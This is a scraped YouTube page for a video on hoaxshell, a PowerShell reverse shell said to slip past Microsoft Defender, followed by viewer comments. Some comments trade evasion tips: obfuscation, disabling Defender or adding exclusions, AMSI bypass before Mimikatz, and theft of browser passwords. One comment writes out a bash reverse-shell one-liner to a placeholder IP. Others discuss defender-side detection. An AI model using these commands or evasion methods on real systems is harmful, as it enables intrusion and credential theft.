Reverse Shell UNDETECTED by Microsoft Defender (hoaxshell)

Подписаться 1,7 млн

Просмотров 161 тыс.

50% 1

j-h.io/plextrac SUPER thankful for PlexTrac for supporting the channel and sponsoring this vide -- try their premiere reporting & collaborative platform in a FREE one-month trial! Spend more time hacking, and less time reporting 😎
Help the channel grow with a Like, Comment, & Subscribe!
❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeacoffee
Check out the affiliates below for more free or discounted learning!
🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
🐜Zero2Automated ➡ Ultimate Malware Reverse Engineering j-h.io/zero2auto
🐜Zero2Automated ➡ MISP & Malware Sandbox j-h.io/zero2auto-sandbox
⛳Point3 ESCALATE ➡ Top-Notch Capture the Flag Training j-h.io/escalate
👨🏻‍💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
📗Humble Bundle ➡ j-h.io/humblebundle
🐶Snyk ➡ j-h.io/snyk
🤹‍♀️SkillShare ➡ j-h.io/skillshare
🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
📧Contact me! (I may be very slow to respond or completely unable to)
🤝Sponsorship Inquiries ➡ j-h.io/sponsorship
🚩 CTF Hosting Requests ➡ j-h.io/ctf
🎤 Speaking Requests ➡ j-h.io/speaking
💥 Malware Submission ➡ j-h.io/malware
❓ Everything Else ➡ j-h.io/etc

Опубликовано:

10 окт 2022

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист

Посмотреть позже

Комментарии : 309

@HaxorTechTones Год назад

Thank you from the heart for making this, John! Heads up for the people watching this: hoaxshell's payload won't work in constrained language mode due to the method invocation error. The shell is actually established but as it utilizes POST requests to send each command's output back to the attacker, it gets cut off. It could work (in theory) if the output was send back to the attacker via GET, which of course would require to modify the tool and find a workaround for the limited length of chars that can be transferred within a URL.

@NahImPro Год назад

This is awesome to have the provider of this script comment on your channel John. You’re awesome man you motivate me daily.

@centdemeern1 Год назад

Would you be able to put some of the stuff that doesn't fit into the URL into a header?

@HaxorTechTones Год назад

@@centdemeern1 you could, although, i believe the best approach would be to split the cmd output to multiple get requests (if output.length > 2064 ) and notify the hoaxshell server accordingly to combine a number of GET requests, e.g. via a custom header, like "X-Combine: 5" or whatever. There's actually an unlimited amount of awesome things you could do by enriching the powershell payload but the length of it is a major issue. I tried to keep the payloads generated by hoaxshell as short and compact as possible.

@centdemeern1 Год назад

@@HaxorTechTones I see, that makes sense. Maybe something like this could be a command line flag (ex. --constrained-language-mode) with a warning that it'll make the payload larger. If not, maybe I'll fork it or something. If I feel like it. Who knows.

@HaxorTechTones Год назад

@@centdemeern1 yeah i was actually thinking to add exactly that in the next update.

@jxberrios Год назад

John, you have NO idea how long I've been trying different mechanisms unsuccessfully and after watching this, I decided to try it out...and dude!!! This tool is definitely amazing!!

@MsRebel411 Год назад

Just found this channel last week and I'm loving it...

@lucawills Год назад

Thanks so much John! This worked really well for me on a HTB machine where the windows machine had an AV that blocked all reverse shells I tried, accept for the one shown in this video! Works amazingly :)

@PostMeridianLyf Год назад

I am 1000% addicted to your content! Please keep this coming, my brain is in love with you!

@cirklare Год назад

You are right, PlexTrac Is making a difference in reporting process My first report at hacker1 was about open redirect in grab company (Asian version of UBER) With PlexTrac you can report in 15 minutes instead of 2 hours To get them to your point and explain what you did

@realelaverick Год назад

I think the problem you're getting with the base64 decode is that it is encoded in UTF-16 but the Linux base64 -d command decodes to ASCII

@TheMAZZTer Год назад

Probably encoded UTF-8, since it only encounters problems with one or two characters it seems. UTF-8 is compatible with ASCII until you use characters not in ASCII, which get encoded as double width or wider. Possibly sublime detected the resulting file as UTF-8 when ASCII would have been better, or something. Difficult to know exactly where things screwed up.

@handlemchandleson1 Год назад

❌He doesnt copy all of the B64 at 11:00 lol, thats why❌ Edit: nah nvm

@beyondcatastrophe_ Год назад

@@handlemchandleson1 Not true. Also he's pasting there. If the base64 string was incomplete, there wouldn't be the == at the end

@LouisSerieusement Год назад

@@beyondcatastrophe_ he forgot the first line at the top

@JeffNoel Год назад

@@handlemchandleson1 He doesn't use the pasted content though when he tries to select it within the payload.b64 file. He directly specifies base64 -d payload.b64 (which contains the full payload) instead of doing an echo "PasteStringHere" | base64 -d

@Rojawa Год назад

As a german, I have to admit... the X at 05:30 is SUS

@hctiBelttiL Год назад

It's left-handed, as opposed to what you're referring to. Probably a stylized Hindu sauwastika. It's also a character in Chinese and Japanese script, or it could be something else entirely. Aliens? Tire burns for monster trucks? The possibilities are endless!

@user-fq6ti2fg9n 19 дней назад

I love the way you break things down 👍 in all your videos. Continue your hard work

@_hackwell Год назад

awesome ! I'll use it on my next boxes for sure

@davidnagy4723 Год назад

Hi John. As t3l3machus showed it in one of his vids. Hoaxshell actually still works with minimal modification to the base payload and goes through some free AV too

@DarkFaken Год назад

Hey John, have you had a look at the cmdlet New-Module? I came across it today in the documentation, apparently it allows for creating script blocks in memory. Wondering if that would work similar to iex

@G-33k Год назад

Only 2 guys are my favorite in tech field on youtube, John Hammond & David Bombal

@rafag9129 Год назад

You’re forgetting @ippsec

@brandonevans5123 Год назад

and LiveOverflow!

@48pluto Год назад

@ippsec is probably not human LOL but certainly my best source into ethic hacking

@JustinBarfitt Год назад

yeah, you can definitely replace bombal from that list for a quality cyber sec channel... IPPSEC, hackersploit, The Cyber Mentor, etc.

@MrDaveUsesWords Год назад

No love for @jackrhysider ?

@Lampe2020 Год назад

5:00 This commentary on the code is just hilarious!

@chrisfahie2767 Год назад

It's working thanks my friend

@jakepanda209 Год назад

Hi John, how are you after a very long time watching your video? Amazing content, thank you

@chrisfahie2767 Год назад

Worked , thanks a lot!

@otakusong66 Год назад

You really good at explaining thank you

@tiktoknesia3657 Год назад

This exertion Hella good! Recommended

@khaelkugler 11 месяцев назад

Hey John! Cool video--I do some red teaming and I'd like to know how you come across these reverse shells that bypass EDRs. Are there decent resources on the clearnet?

@zaneaussie Год назад

Awesome man! Now how to get it to run on a remote machine 😛

@disdroid Год назад

So presumably you would have control of the router and use that to deliver the payload and open a port for remote access but you still need to execute the powershell command on the target

@geroffmilan3328 Год назад

Executing code on a target is a trivial task, given the multitude of delivery methods ranging from phishing thru web-based scripts to USB disks or keyboard impersonators. If you can block all of those - and in theory it's not a bad idea - you'll end up in practice with a very limited-use computer, which might as well be running a RISC-based CPU & OS if it can still do its intended job in this state.

@RAJA-di5qj Год назад

Thanks teacher ji🇮🇳💫

@plasmasupremacy9321 Год назад

A bit of a silly comment but; the way your lighting is setup it casts shadows from your glasses that look kinda like winged eyeliner. And honestly, slay dude, you look great, haha

@fastmot1on Год назад

You could probably edit that payload to ensure it grabs the system proxy settings and uses them, this way it should be usable from within enterprise networks.

@elllieeeeeeeeeeeeeeeeeeeeeeeee Год назад

Enterprise nws probably would have a firewall

@Spelter Год назад

@@elllieeeeeeeeeeeeeeeeeeeeeeeee True, and a connection to Port 80 instead 8080 will be tunneled through the proxy, maybe 443 with SSL and the Firewall is not set up to decrypt the stream to inspect it. Could work, good Enterprise Networks do SSL Inspection, but only if the host is not having set up security measures like Google or Microsoft do. Problem is, like it always was, bring the code into a system and execute it. You can't send a ps1 file and say "hey, here is a patch", because per Default, script execution is disabled and a warning pops up. You can send an Exe file, which starts a powershell in a process in the background, but how do you get your App to your victim. Still, a nice tool to know.

@geroffmilan3328 Год назад

@@elllieeeeeeeeeeeeeeeeeeeeeeeee proxies exist to allow firewall bypass for specific protocols. Users are often restricted in terms of what they can access via the proxy - ususlly based on categories defined by the proxy vendor, unless the company chooses to micromanage on a per-URL basis. Admins, however, often have way less restrictions, and are a more valuable target anyway. The solution is threat-hunting: someone must ensure logs are gathered from the end user devices, proxies, firewalls, switches & every other element in the chain, then built alerts and actions based on content found across all of those log types.

@aymaneelhadi2954 Год назад

Hey man, It works great and without any problems.

@idrissasow1595 Год назад

This tutorial is amazing and you are really good at teaching !! great job sir !

@purplesprout5774 Год назад

great content John, I'd be interested as well seeing how that looks from a threat hunting/ defender PoV, how could I detect it, spawned processes, event logs, dropped files etc. If I had sysmon running what could I see in a SIEM

@purplesprout5774 Год назад

Should have said, alerting on obfuscated powershell in a SIEM would have detected that it ran

@abdullahyasin3055 Год назад

probably that powershell - e payload in under powershell process, we can hunt for that in sysmon

@agsystems8220 Год назад

@@purplesprout5774 It would, but in a real world it probably wouldn't be obfuscated. It would be casually placed somewhere in a 'utility' that does something else. The code block that is running on the windows machine is so simple that it probably almost exists in the wild for legitimate limited reasons. A legitimate app would not be a raw running of an expression fetched from somewhere, but it may parse some data from somewhere into part of an expression and run that. This still seems like a bad idea because if the parsing can be escaped it becomes a shell, but that doesn't mean it isn't done. The problem is that this simple demonstration is not the real problem (though script kiddies will abuse it). More of an issue is deliberately weak parsing in an otherwise functional application involving invoke-expression. Preventing the use of invoke-expression on retrieved data would not be backward compatible, while detecting buggy parsing is 'hard' due to parsing being a Turing complete problem. This demonstrates that any use of invoke-expression on data retrieved from a remote server is potentially a reverse shell. At best it is an attack surface, at worst a deliberate backdoor. I guess you could go through the uses of invoke-expression and try to characterise and whitelist legitimate ones. Automated detection is extremely hard though, due to 'doing anything' being invoke-expression working as intended.

@franciscovasquez6566 Год назад

Hoaxshell was able to bypass elastic endpoint. I am pleased lol.

@ThinhNguyen-lc2py Год назад

Hi John, Love all content you created. I'm learning Cyber; still finding a new laptop to work. Do you have any advice? May I ask what is ur device specifications? Best

@slybandit8117 Год назад

This was cool, but in less than 7 months, Windows has made a patch for this. My newly created Win11 VM, with no updates AND most of Defender turned off was catching it. You must keep Real-Time Protection off (that's the only time I got a rev-shell), but it keeps turning itself back on now. I am updating the VM and I am going to try them again. Thanks for the vid! Awesome as always!

@BrickTamlandOfficial Год назад

7 months lol is that supposed to be a bragg about windows security? lol

@outcome2715 4 месяца назад

Easy to bypass , give it instructions to launch user level command prompt in the background (so user doesn’t see) obfuscate your new code so AV doesn’t pick up on the command prompt command , inject it into a legit application ( plenty of ways) and your good to go.

@slybandit8117 4 месяца назад

@@outcome2715 Cool. Thanks for the tips. You make it sound easy, I’ll have to try a little harder.

@slybandit8117 4 месяца назад

@@BrickTamlandOfficial no. If anything the opposite. But no that’s not at all why I said that. It was literally just the time that it was working then not.

@torsec6048 Год назад

nice john this is the main reason you r my most fav youtube content creator

@Cossaw Год назад

I saw this from you first! Good stuff

@torsec6048 Год назад

@@Cossaw thanks mate but john hammond is great his all videos r on the whole different level

@myfirsthak Год назад

Sweet. I will try this tonight. Sadly my antivirus windows 10 defender catches it but try the ducky script I posted still works.

@himashhimash6017 Год назад

After havoc c2 ..... good one

@spoon0r Год назад

Been using this for a while. It's really nice, my go to quick Windows shell.

@austinmurphy9074 Год назад

rip, about to not work anymore lol

@reynaldo7371 Год назад

tried hoaxshell last month on Kali VM to my main PC with Avast Premium Security enabled and updated. It freaked me out Avast didn't detect anything, windefender neither.

@elllieeeeeeeeeeeeeeeeeeeeeeeee Год назад

avast sucks

@reynaldo7371 Год назад

@@elllieeeeeeeeeeeeeeeeeeeeeeeee got it for cheap, still better than win defender i guess

@reynaldo7371 Год назад

@FsocietyI see what you mean, but... I know I won't let any stranger go inside my house, what I can do is atleast to lock the door.

@hypedz1495 Год назад

John.. John Hammond. Good content 👏

@filipomazic8823 Год назад

i think your b64 was weird cause by default it uses utf8 and yours was encoded with utf16 by hoaxshell it seems. Let me know if im wrong Awesome vid btw

@OneOfThePetes Год назад

Man, your hair grew quickly!

@danielniedzwiecki638 Год назад

As always, everything is super. Waiting for new cheats from your side

@profexer Год назад

No threat Actors really uses Single reverse shell in the wild. But it's good to see WD and other AV's to get bypass from time to time 😏

@PhotoSlash Год назад

update: it does get blocked by AV now

@tom-on Год назад

ngl the x in the logo do be looking kinda sus

@lancemarchetti8673 Год назад

Brilliant 👏

@ciloksejati4154 Год назад

wow discussed here👍

@swifty010 9 месяцев назад

lol watching a jh vid with a jh ad never seen this before

@yashprasad2639 Год назад

Ppl don't understand that windows defender might be bad but it does one thing that is really helpful it tells us that a app is signed by a valid company if the and if a app dosen't have a signature by a renowned company it's a really big red flag

@justfuture6585 Год назад

Great video as always

@abepl Год назад

where should i start if i wanna get into pentesting ( a part from experimenting myself) ?

@prabhatjoshi602 Год назад

I did try to replicate this and found out that this works only when the defender toolkit isn't installed on the system. Mine was win 11 enterprise eval edition similar to John and i saw that i needed to install the toolkit of some kind from the windows update in settings for the defender to start working. Maybe John's system didn't had that installed and so it bypassed it gracefully.

@draugh1r219 Год назад

Now the question is how many systems have it?

@prabhatjoshi602 Год назад

@@draugh1r219 Yup, that is also true.

@hackximus Год назад

Unfortunately, it is already detected by Sophos AV. Three weeks ago it was still working. Unfortunately, already too well known. It is a matter of time that Windows Defender will detect the reverse shell. But cool project.

@syskey1402 Год назад

yea, but if u modify the source code only a little and also obfuscate it in layers, maybe it could still bypass

@mentor_bajrami Год назад

Unfortunately?

@hackximus Год назад

@@syskey1402 The problem is that many who look at John do not have the experience to analyze or read a code and change it so that it then works. I fully agree with you that the change is not detected by the Sophos AV. Weekend task for me. 😜

@syskey1402 Год назад

@@hackximus lol, yes

@henryd4968 Год назад

Hi I am new to the topic and wanted to ask if it is theoretically possible to also not use his IP address for this but something else like a server?

@salman-si7me Год назад

Great video very well explained- unfortunately two devices of mine are corrupted-hard disk errors-permissions and system keeps taking ownership! This is because Powershell scripts running automatically+unrestricted policy-bios is configured WiFi as well-I can’t connect again with my new device to my WiFi due to powershell and kali linked- if anyone has any ideas i would really appreciate it -

@feloxes Год назад

you can bypass Amsi and then do Mimikatz

@wtfdoiputhere Год назад

I remember in Windows 10 i made a batch script that automatically ran as administrator so i could use powershell commands to download the payload from my server and exclude.exe from being scanned

@olivermejia3786 Год назад

Great idea

@wtfdoiputhere Год назад

@@olivermejia3786 i was honestly shocked how simple and effective it was i even wrote a blog about it

@outlawnation5160 Год назад

@@wtfdoiputhere exclude.exe?

@wtfdoiputhere Год назад

@@outlawnation5160 yes, using powershell commands you could tell Windows defender to exclude certain folders or file types from being scanned

@outlawnation5160 Год назад

@@wtfdoiputhere that’s pretty powerful (no pun intended). Do you have a GitHub for the script?

@spelz1751 Год назад

AV picked it up real quick. Perhaps it has already been registered by defender as a threat.

@Gh0st_0723 Год назад

Yup but disabling it can be a part of the script.

@mcmaly86 Год назад

YO THANK YOU SO MUCH

@user-qc5hd6ih7q Год назад

one question , does the windows machine has to be on the same network? im new in this area :)

@crimsonmoon9404 Год назад

its only a matter of time before more are found.

@Riborwahz Год назад

Great one

@caleboleary182 Год назад

John from the future has great hair

@atsekbatman Год назад

Nice little video!

@techeater4051 Год назад

This is sick!

@Yadav-it3ku Год назад

Hello @John Hammond sir I've tried the Hoaxshell many times but it's not working... Can you checkout this and please provide the solution. Everytime I run the reverse shell, the defender detects the payload as malicious and throws error.

@ThePowerRanger Год назад

Seems like Windows needs to get it's security up.

@hballouz 10 месяцев назад

in the video LAN IP addresses are used, what IP should be used if the payload is ran on a computer outside my network ? is it my public IP ?

@ggdgfd9392 Год назад

Just simply put the code, it works! thanks!

@jondoe79 Год назад

Payload is encoded in base16

@rsvv6828 Год назад

Can we use plextrac for oscp report

@Panda-wi9vf Год назад

Looks like that windows supporter watched your video. when cloud protection is on havoc´s demon gets flagged as a trojan🤣🤣🤣

@rpmathur1278 3 месяца назад

Can it work over internet if we place cloudfare url in place of ip address?

@UsamaAli-kr2cw Год назад

I tried this one week before and it didn't worked the box have deep security enabled i disable the deep security agent and windows defender was already disabled prior to my testing but still it didn't worked.

@harryjazon7734 Год назад

Does kali proxychains work on virtual box?

@JNET_Reloaded Год назад

Nice this is my fav vid of the year!

@Nexus_Programming Год назад

very awesome

@KamKam-ym3do Год назад

theres three on my computer. they wont go away, contebrew, trickbot, "systen32" (not system systen)

@Silencer1337 Год назад

I fail to see what's there to detect about this. User opening Powershell and executing a malicious command is his problem, no?

@smokingone Год назад

Did you run powershell as an administrator? If so I don't see this software having any practical use besides possibly diagnostics. If you don't need an admin shell on the windows machine then it would be possible to write an autoexec.bat file and put it on a usb and then all it would take is a few moments access to the machine assuming the owner didn't disable autorun.

@wouter2754 Год назад

no powershell needed I think

@oproadiakdajdbhjadajsld Год назад

doesnt work anymore. tested on fully updated wind 11 machine (28/10/22)

@exeplays7212 Год назад

That x is looking kinda SUS

@user-pb5tt7zu9g 10 месяцев назад

Hello everyone, I can not run hoaxshell listener on newest ubuntu, it gives error ,,No module named 'gnureadline'. New Python does not supported gnureadline. How can I fix this or how can i use hoaxshell on newest linux system?

@codewithraiju1424 Год назад

We can find a few reverse shells if we search a little that can bypass win defender.. The hard part is finding a rat with rdp

@Bruh-sp2bj Год назад

what do you need rdp for? Just use the system shell

@codewithraiju1424 Год назад

@@Bruh-sp2bj yeah. But there is a swag of rdp.. With shell we can do a lot but with rdp we can even get passwords stored in the browser of a victim..

@realavdhut Год назад

@@codewithraiju1424 bruh ? if you have a shell then just download the saved passwords/cookies from the browser directory stored locally with help of that shell

@codewithraiju1424 Год назад

@@realavdhut yeah but I think they are encrypted, Aren't they?

@realavdhut Год назад

@@codewithraiju1424 yeah they are .. but there are different methods to retrieve it ... for eg enum_chrome

@unam456 Год назад

The Windows 11 isolation core and memory integrity protect against this type of attacks? And if i got filtrated ports, router with firewall, nat, antivirus and PC firewall?

@randomuser1911 Год назад

is there a way to change the port?

@shibbyshaggy Год назад

Can you showcase this technique with your No-Click download html page?

@onmc4754 Год назад

I made something like this instead of power shell I am using batch, amazing to see more than one person can come up with the same idea.

@lancemarchetti8673 Год назад

I also found a way to drop eee male linx and you R L's into youtube comments without the spam bots detecting it...

@witcnshum Год назад

what happens if you turn off Powershell and disable scripts in the Policy Editor or configure firewall to block reverse shell

@y.vinitsky6452 Год назад

How would the firewall block it? All I would need to do is find an open port like dns

@witcnshum Год назад

@@y.vinitsky6452 damn,, cant wait for next video there must be an answer

@_Slaze Год назад

Should still be bypassable. But it depends on your configuration. For example you can use unmanaged powershell instead of a normal powershell.exe instance.

@RemainZStudio Год назад

hi John love your work but there is a huge security fundamental you not enabling which is E3 all Windows Pro and Enterprise have this security features they just not enabled.... also are you running vanilla windows or what Baseline are you running...? it impossible to run a base64 code and get a shell if you do not secure windows, first of all you need to enable Application Control and Core Isolation this will check all files and code before executing, also when you run your Windows VM you need it to run for 24 hours before you do testing as windows will communicate with Defender cloud to check what files it need to update in the background.

@morganguesdon2202 Год назад

awesome!!

@0xC4aE1e5 Год назад

I think the garbage text is ASCII, and PowerShell uses UTF16le.

@CenterZero_DeadSecurity Год назад

How would you do reverse shells from outside the LAN? Port forwarding is too much effort xd

@elllieeeeeeeeeeeeeeeeeeeeeeeee Год назад

Hamachi ?

@wizz7599 Год назад

Use a server that will give you a public IP. (AWS for example).

@castles990 Год назад

Just use ngrok

@sapito169 Год назад

this is soo good that i feel guilty just to watchit

@catalinancutei5390 Год назад

Isn't this just like you would type: sh -i >& /dev/tcp/some_ip_here/some_port 0>&1 on a linux host? I mean of course the antivirus wouldn't block it because it is the expected behaviour. What would then be the difference between you connecting to a reverse shell and your browser connecting to a web server? From what I know a reverse shell vulnerability is suppose to let you gain access to a host without having physical access to it ( through a public web service or something ). If I'm wrong or is something I'm missing please correct me.

@_Slaze Год назад

Windows defender uses AMSI to detect the execution of malicious PowerShell, like a reverse shell. The point of this is, you can use the undetected reverse shell as a communication method to your c2 Server like Malware often does

@catalinancutei5390 Год назад

@@_Slaze I see

@udotcarter Год назад

How does Crowdstrike deal with this?

@demon1058 Год назад

I have created a Data deleter Ransomware that deletes the data within your files and you get reverse shell after the deletion is completed and it is undetectable, i run the mrt scan , malware bytes scan but none of them can detect it